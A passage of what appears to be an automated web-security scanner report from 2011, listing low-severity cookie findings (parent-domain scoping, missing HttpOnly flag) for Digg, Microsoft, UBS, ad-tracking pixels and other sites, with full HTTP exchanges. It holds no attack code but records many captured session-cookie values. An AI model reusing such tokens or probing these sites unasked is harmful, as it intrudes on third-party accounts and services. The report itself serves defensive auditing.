ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x368 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

9.44. http://rs.gwallet.com/r1/pixel/x369 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x369

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x369 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=S4-740-e5b0-I3b0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

10. Cookie without HttpOnly flag set previous next
There are 73 instances of this issue:

http://about.digg.com/
http://about.digg.com/ads
http://about.digg.com/blog
http://about.digg.com/contact
http://about.digg.com/faq
http://about.digg.com/partnership
http://about.digg.com/privacy
http://about.digg.com/terms-use
https://accountservices.passport.net/gethip.srf
http://c.microsoft.com/trans_pixel.aspx
http://developers.digg.com/
http://jobs.digg.com/
http://knowledgelayer.softlayer.com/
https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm
https://nae.ubs.com/quotes
https://nae.ubs.com/quotes/markets_instruments
http://ping.fm/ref/
http://ad.yieldmanager.com/pixel
http://adonmax.com/afr.php
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://bstats.adbrite.com/adserver/behavioral-data/0
http://cang.baidu.com/do/add
http://clk.atdmt.com/MRT/go/285207471/direct/01/
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
http://delicious.com/save
http://digg.com/
http://digg.com/upcoming
http://friendfeed.com/share
http://idcs.interclick.com/Segment.aspx
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
https://live.zune.net/xweb/passport/bottomCB.aspx
https://live.zune.net/xweb/passport/rightCB.aspx
https://live.zune.net/xweb/passport/topCB.aspx
https://login.live.com/login.srf
https://login.live.com/pp1100/
https://login.live.com/ppsecure/post.srf
https://login.live.com/ppsecure/secure.srf
https://login.live.com/resetpw.srf
http://m.webtrends.com/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif
http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif
http://m.webtrends.com/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif
http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif
https://msnia.login.live.com/ppsecure/post.srf
http://p.brilig.com/contact/bct
http://pinpoint.microsoft.com/en-US/Default.aspx
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/G10937/a4/0/0/0.302
http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js
http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif
http://profile.live.com/badge/
http://promote.orkut.com/preview
https://quotes-public.ubs.com/
https://quotes-public1.ubs.com/app/CGT/Workbench/
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it
https://quotes-public1.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_mi
http://r.turn.com/r/beacon
http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999
http://rs.gwallet.com/r1/pixel/x1094
http://rs.gwallet.com/r1/pixel/x1225
http://rs.gwallet.com/r1/pixel/x368
http://rs.gwallet.com/r1/pixel/x369

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. http://about.digg.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=96839786b8fdb7818a75089363be3cac; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=96839786b8fdb7818a75089363be3cac; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17973

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.2. http://about.digg.com/ads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/ads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=8d9cb78aa1d77381647579b491d16261; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=8d9cb78aa1d77381647579b491d16261; expires=Fri, 29-Jul-2011 14:54:34 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7213
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.3. http://about.digg.com/blog previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/blog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=d3bd911c4412a5f105a30b014982aaed; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=d3bd911c4412a5f105a30b014982aaed; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15614

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.4. http://about.digg.com/contact previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=183f9d06f7faf23f4425f2bca06ffba5; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=183f9d06f7faf23f4425f2bca06ffba5; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7886
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.5. http://about.digg.com/faq previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=2eb23705fdf587154cd28b12c4d39ae6; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.6. http://about.digg.com/partnership previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/partnership

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=81512413a75972f559239632a17b7d62; expires=Fri, 29-Jul-2011 14:54:35 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partnership HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=81512413a75972f559239632a17b7d62; expires=Fri, 29-Jul-2011 14:54:35 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8103

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.7. http://about.digg.com/privacy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=5dae80891524c3f10a5dd8dcaee38263; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=5dae80891524c3f10a5dd8dcaee38263; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16757

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.8. http://about.digg.com/terms-use previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://about.digg.com
Path:	/terms-use

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSffbdf82fc09bcc0e216782b4624d5374=790163a5d0bb3c66f0901f4df9eaeead; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=790163a5d0bb3c66f0901f4df9eaeead; expires=Fri, 29-Jul-2011 14:54:37 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24783

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

10.9. https://accountservices.passport.net/gethip.srf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://accountservices.passport.net
Path:	/gethip.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.10. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.11. http://developers.digg.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://developers.digg.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS395417e620b9b9b47288b47745f54be6=98edcda430c01adc5de44ed3b21784ec; expires=Fri, 29-Jul-2011 14:54:56 GMT; path=/; domain=.developers.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: developers.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESS395417e620b9b9b47288b47745f54be6=98edcda430c01adc5de44ed3b21784ec; expires=Fri, 29-Jul-2011 14:54:56 GMT; path=/; domain=.developers.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5997
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.12. http://jobs.digg.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://jobs.digg.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSb35b189ffa137f2f4ba6e0ebbe3d6f9c=e8b60e479e4f64320ce8065cb6d3ca23; expires=Fri, 29-Jul-2011 15:10:31 GMT; path=/; domain=.jobs.digg.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: jobs.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.13. http://knowledgelayer.softlayer.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://knowledgelayer.softlayer.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=f5088c0e2e03edd7fff01fa38f08d18e; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: knowledgelayer.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:00 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5088c0e2e03edd7fff01fa38f08d18e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 38314
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>K
...[SNIP]...

10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://nae.ubs.com
Path:	/awu/help/inter/en/ubsHelp.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PD-S-SESSION-ID=2_L9gle69HertpY5M1FA0n6S8Ha8hmI3x+G1EGHTEEbrittFE1; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /awu/help/inter/en/ubsHelp.htm HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:24 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1958
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_L9gle69HertpY5M1FA0n6S8Ha8hmI3x+G1EGHTEEbrittFE1; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/awu/help/inter/en/ubs
...[SNIP]...

10.15. https://nae.ubs.com/quotes previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://nae.ubs.com
Path:	/quotes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PD-S-SESSION-ID=2_QnzyiVMmCmOuQc59lEBC6wIYAyv-NToCOLr+gbDJuPrkFe1I; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:21 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1935
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_QnzyiVMmCmOuQc59lEBC6wIYAyv-NToCOLr+gbDJuPrkFe1I; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes">
</head>
<bod
...[SNIP]...

10.16. https://nae.ubs.com/quotes/markets_instruments previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://nae.ubs.com
Path:	/quotes/markets_instruments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PD-S-SESSION-ID=2_SX4z2ua6xceeMCGR3a5iZThqKGwm33qPdj7u-pf6nRdVUcxu; Path=/; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes/markets_instruments HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:19 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1955
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_SX4z2ua6xceeMCGR3a5iZThqKGwm33qPdj7u-pf6nRdVUcxu; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instru
...[SNIP]...

10.17. http://ping.fm/ref/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ping.fm
Path:	/ref/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=3p28cc2ebck30pasml0mp53is1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/ HTTP/1.1
Host: ping.fm
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Wed, 06 Jul 2011 11:21:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3p28cc2ebck30pasml0mp53is1; path=/
Content-Length: 0
Connection: close
Via: 1.1 AN-0016020121270012

10.18. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

